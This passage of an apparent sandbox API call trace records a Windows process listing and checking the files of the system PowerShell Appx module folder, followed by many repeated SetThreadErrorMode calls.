cAlternateFileName="")) returned 0x25b73f769d0 [0286.563] FindNextFileW (in: hFindFile=0x25b73f769d0, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.563] FindNextFileW (in: hFindFile=0x25b73f769d0, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0286.563] FindNextFileW (in: hFindFile=0x25b73f769d0, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0286.563] FindNextFileW (in: hFindFile=0x25b73f769d0, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0286.563] FindNextFileW (in: hFindFile=0x25b73f769d0, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0286.563] FindNextFileW (in: hFindFile=0x25b73f769d0, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0286.563] FindClose (in: hFindFile=0x25b73f769d0 | out: hFindFile=0x25b73f769d0) returned 1 [0286.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.564] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x653ef8d010, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0286.564] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73f775d0 [0286.564] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.564] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0286.564] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0286.564] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0286.564] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0286.564] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0286.564] FindClose (in: hFindFile=0x25b73f775d0 | out: hFindFile=0x25b73f775d0) returned 1 [0286.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.565] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x653ef8d0f0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0286.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.565] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d620 | out: lpFileInformation=0x653ef8d620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0286.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.565] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x653ef8d070, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0286.565] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0x653ef8d2a0 | out: lpFindFileData=0x653ef8d2a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73f76a90 [0286.565] FindNextFileW (in: hFindFile=0x25b73f76a90, lpFindFileData=0x653ef8d260 | out: lpFindFileData=0x653ef8d260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.565] FindNextFileW (in: hFindFile=0x25b73f76a90, lpFindFileData=0x653ef8d260 | out: lpFindFileData=0x653ef8d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0286.565] FindNextFileW (in: hFindFile=0x25b73f76a90, lpFindFileData=0x653ef8d260 | out: lpFindFileData=0x653ef8d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0286.566] FindNextFileW (in: hFindFile=0x25b73f76a90, lpFindFileData=0x653ef8d260 | out: lpFindFileData=0x653ef8d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0286.566] FindNextFileW (in: hFindFile=0x25b73f76a90, lpFindFileData=0x653ef8d260 | out: lpFindFileData=0x653ef8d260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0286.566] FindNextFileW (in: hFindFile=0x25b73f76a90, lpFindFileData=0x653ef8d260 | out: lpFindFileData=0x653ef8d260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0286.566] FindClose (in: hFindFile=0x25b73f76a90 | out: hFindFile=0x25b73f76a90) returned 1 [0286.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.566] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1")) returned 0x20 [0286.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.577] 